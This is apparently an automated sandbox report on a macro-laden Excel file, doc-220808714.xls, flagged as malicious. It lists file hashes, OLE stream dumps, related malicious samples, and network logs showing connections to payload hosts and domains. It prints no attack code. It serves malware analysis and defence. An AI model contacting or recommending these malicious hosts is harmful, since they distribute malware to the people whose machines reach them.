                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:29
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal76.expl.winXLS@7/1@3/3
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 95.100.218.79, 52.109.76.68, 52.109.88.37, 52.109.12.24, 52.109.12.22, 95.100.216.89, 20.82.209.183, 20.54.110.249, 40.112.88.60, 20.199.120.182, 13.107.4.50, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.82.210.154, 20.199.120.151
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                101.0.112.4doc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                  108.179.242.179doc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                    414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        172.93.99.178430#U0437.jsGet hashmaliciousBrowse
                                                                                                                                                        • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                                                                                                                                                        430#U0437.jsGet hashmaliciousBrowse
                                                                                                                                                        • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                                                                                                                                                        34029.docGet hashmaliciousBrowse
                                                                                                                                                        • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                        http://51.254.121.123/wp-content/0AR/com/USGet hashmaliciousBrowse
                                                                                                                                                        • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                        8590170.docGet hashmaliciousBrowse
                                                                                                                                                        • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        madieandme.com.audoc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        amerident.com.dodoc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 108.179.242.179

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUdoc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        ITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.docGet hashmaliciousBrowse
                                                                                                                                                        • 116.90.56.138
                                                                                                                                                        Inquiry-Doors.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.91.38
                                                                                                                                                        product specification.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        7PUgGUWM2lGet hashmaliciousBrowse
                                                                                                                                                        • 182.160.170.135
                                                                                                                                                        Attached Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        Cd9EA600XXdm0tl.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        E8ljMuBj9LGet hashmaliciousBrowse
                                                                                                                                                        • 111.67.13.18
                                                                                                                                                        QcXQmNSaSpGet hashmaliciousBrowse
                                                                                                                                                        • 49.156.27.62
                                                                                                                                                        arm7Get hashmaliciousBrowse
                                                                                                                                                        • 111.67.13.28
                                                                                                                                                        QYUNlRkkn1.exeGet hashmaliciousBrowse
                                                                                                                                                        • 203.16.60.34
                                                                                                                                                        6Y5P9BoimMLclbt.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        gunzipped.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        SecuriteInfo.com.Variant.Bulz.627351.21436.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        ENQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        16wKmiVoPj05ynr.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        PO.NO.V21015.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        New Inquiry 21411JA20pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.117.102
                                                                                                                                                        fsd8ks3VNb.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.105.170
                                                                                                                                                        UNIFIEDLAYER-AS-1USdoc-220808714.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        jjBv8SpZXm.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.0.218
                                                                                                                                                        Scan_0978.exeGet hashmaliciousBrowse
                                                                                                                                                        • 173.254.94.114
                                                                                                                                                        pKD3j672HL.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.131.113
                                                                                                                                                        heiedrNhQ8Get hashmaliciousBrowse
                                                                                                                                                        • 142.5.140.216
                                                                                                                                                        Kredi Karti Hesap #U00d6zeti - 4508xxxxxxxx0017.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.163.68
                                                                                                                                                        lod2.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.241.226.37
                                                                                                                                                        Contract and PO No.908876.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        iwah6jVhmwGet hashmaliciousBrowse
                                                                                                                                                        • 98.130.22.83
                                                                                                                                                        BL-210915L0.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.254.180.165
                                                                                                                                                        mFKC2tSCJXGet hashmaliciousBrowse
                                                                                                                                                        • 76.163.226.11
                                                                                                                                                        Urgent Inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        PO 007661721.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        P.I 099880990.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 162.214.65.211
                                                                                                                                                        1QbmrgleyAWkb39.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.84.191
                                                                                                                                                        (RG25LGSJ).exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.241.216.179
                                                                                                                                                        103 Ref 2853801324189923.exeGet hashmaliciousBrowse
                                                                                                                                                        • 67.20.76.184
                                                                                                                                                        doc_0862413890.exeGet hashmaliciousBrowse
                                                                                                                                                        • 74.220.199.6
                                                                                                                                                        swift.Telex.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 192.185.115.3
                                                                                                                                                        g4225Fz3HKGet hashmaliciousBrowse
                                                                                                                                                        • 162.214.19.189

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19538ILRcwmF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        vk5MXd2Rxm.msiGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        INV.pptGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        jtht8EV6uw.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        shipping docs.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        20znh7W3Y1.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        Foreign_Bank Account Details.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        In#U1d20oice-yceeBSo.vbsGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SOA.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SecuriteInfo.com.Variant.Razy.961905.21681.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        Statement of Account of Sep 2021.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        Swift USD 9300.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKDZ.78846.22148.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKDZ.78846.12476.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKDZ.78846.22148.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178
                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKDZ.78846.12476.exeGet hashmaliciousBrowse
                                                                                                                                                        • 101.0.112.4
                                                                                                                                                        • 108.179.242.179
                                                                                                                                                        • 172.93.99.178

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\028E0688-7982-482A-A558-DEEDEEDCA262
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):138049
                                                                                                                                                        Entropy (8bit):5.359424052362488
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:xcQIKNZrBdA3gBwfnQ9DQW+zBY34Zzi7nXboOidXVE6LWME9:5WQ9DQW+zbXa1
                                                                                                                                                        MD5:160312EA7CD3B99B79081826CD763914
                                                                                                                                                        SHA1:5D9331D0C5FCE451C50D3652282077455842C956
                                                                                                                                                        SHA-256:4F10E93B712A36E007C3A8CA73887B02CE038FC37ABDB871407C62236876E17A
                                                                                                                                                        SHA-512:9394F9AB27E2AB7E0A660213EFE818AA7F36E09129684C9C987B8F5626856B9B832EDD7245FB3B3ECBE173EEFFB9DA9E4A79C5D5850EB5518CE463EBA3921F08
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-12T15:21:56">.. Build: 16.0.14604.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Oct 12 08:22:59 2021, Security: 0
                                                                                                                                                        Entropy (8bit):7.531872402672375
                                                                                                                                                        TrID:
                                                                                                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                        File name:doc-220808714.xls
                                                                                                                                                        File size:241152
                                                                                                                                                        MD5:2654fdca7197f542cbd0be823a2a2a9f
                                                                                                                                                        SHA1:149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
                                                                                                                                                        SHA256:f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
                                                                                                                                                        SHA512:1534994b08b95c1a9879afba6a857817146b3aaa06484a65ff89f418b5ca31fa7ffbc2076efdface8f0036f5e3a7f98e95fe0120df3bfe2c2b06ea8e3b96bcaf
                                                                                                                                                        SSDEEP:6144:cKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgq9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7p:09jVzTmszTwvTDy33LvfP1OWr
                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OLE
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "doc-220808714.xls"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:True
                                                                                                                                                        Application Name:Microsoft Excel
                                                                                                                                                        Encrypted Document:False
                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                        Contains Workbook/Book Stream:True
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:True

                                                                                                                                                        Summary

                                                                                                                                                        Code Page:1251
                                                                                                                                                        Author:
                                                                                                                                                        Last Saved By:
                                                                                                                                                        Create Time:2015-06-05 18:19:34
                                                                                                                                                        Last Saved Time:2021-10-12 07:22:59
                                                                                                                                                        Creating Application:Microsoft Excel
                                                                                                                                                        Security:0

                                                                                                                                                        Document Summary

                                                                                                                                                        Document Code Page:1251
                                                                                                                                                        Thumbnail Scaling Desired:False
                                                                                                                                                        Company:
                                                                                                                                                        Contains Dirty Links:False
                                                                                                                                                        Shared Document:False
                                                                                                                                                        Changed Hyperlinks:False
                                                                                                                                                        Application Version:1048576

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:4096
                                                                                                                                                        Entropy:0.43766981378
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f9 00 00 00
                                                                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:4096
                                                                                                                                                        Entropy:0.279171118094
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 229526
                                                                                                                                                        General
                                                                                                                                                        Stream Path:Workbook
                                                                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                        Stream Size:229526
                                                                                                                                                        Entropy:7.71393359025
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                                                                                                                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 12, 2021 17:21:58.515141010 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.515203953 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:21:58.515300035 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.516338110 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.516370058 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:21:58.734189034 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:21:58.734282017 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.745789051 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.745815992 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:21:58.746263981 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:21:58.746360064 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.747867107 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:21:58.791152954 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.148880005 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.148955107 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.149065018 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:22:00.149159908 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:22:00.149395943 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:22:00.149420023 CEST44349745172.93.99.178192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.149430990 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:22:00.149539948 CEST49745443192.168.2.5172.93.99.178
                                                                                                                                                        Oct 12, 2021 17:22:00.201592922 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.201639891 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.201795101 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.202528000 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.202537060 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.853168011 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.855087996 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.859467983 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.859493971 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.859782934 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:00.859900951 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.860924959 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:00.907143116 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.616735935 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.616806984 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.616883993 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:03.616908073 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:03.617070913 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:03.617108107 CEST44349756101.0.112.4192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.617130041 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:03.617192984 CEST49756443192.168.2.5101.0.112.4
                                                                                                                                                        Oct 12, 2021 17:22:03.661320925 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.661356926 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.661447048 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.662065983 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.662081003 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.955693960 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.955816031 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.963017941 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.963037968 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.963612080 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:03.963716984 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:03.964459896 CEST49761443192.168.2.5108.179.242.179
                                                                                                                                                        Oct 12, 2021 17:22:04.007185936 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:04.243886948 CEST44349761108.179.242.179192.168.2.5
                                                                                                                                                        Oct 12, 2021 17:22:04.243995905 CEST44349761108.179.242.179192.168.2.5
